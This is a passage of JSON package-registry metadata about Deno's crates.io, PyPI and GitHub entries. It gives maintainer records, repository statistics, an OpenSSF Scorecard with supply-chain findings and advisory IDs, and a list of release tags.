url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_fetch/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:25.310Z","updated_at":"2022-11-07T18:29:25.310Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.784Z","updated_at":"2023-07-18T22:41:25.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":2692928,"name":"deno","ecosystem":"pypi","description":"Python redistribution of Deno binaries","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":46,"first_release_published_at":"2019-08-22T23:02:22.000Z","latest_release_published_at":"2026-08-27T17:31:43.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:56:54.010Z","created_at":"2022-04-10T10:35:00.682Z","updated_at":"2026-08-29T21:56:54.010Z","registry_url":"https://pypi.org/project/deno/","install_command":"pip install deno --index-url https://pypi.org/simple","documentation_url":"https://deno.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":[],"normalized_name":"deno","project_status":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","t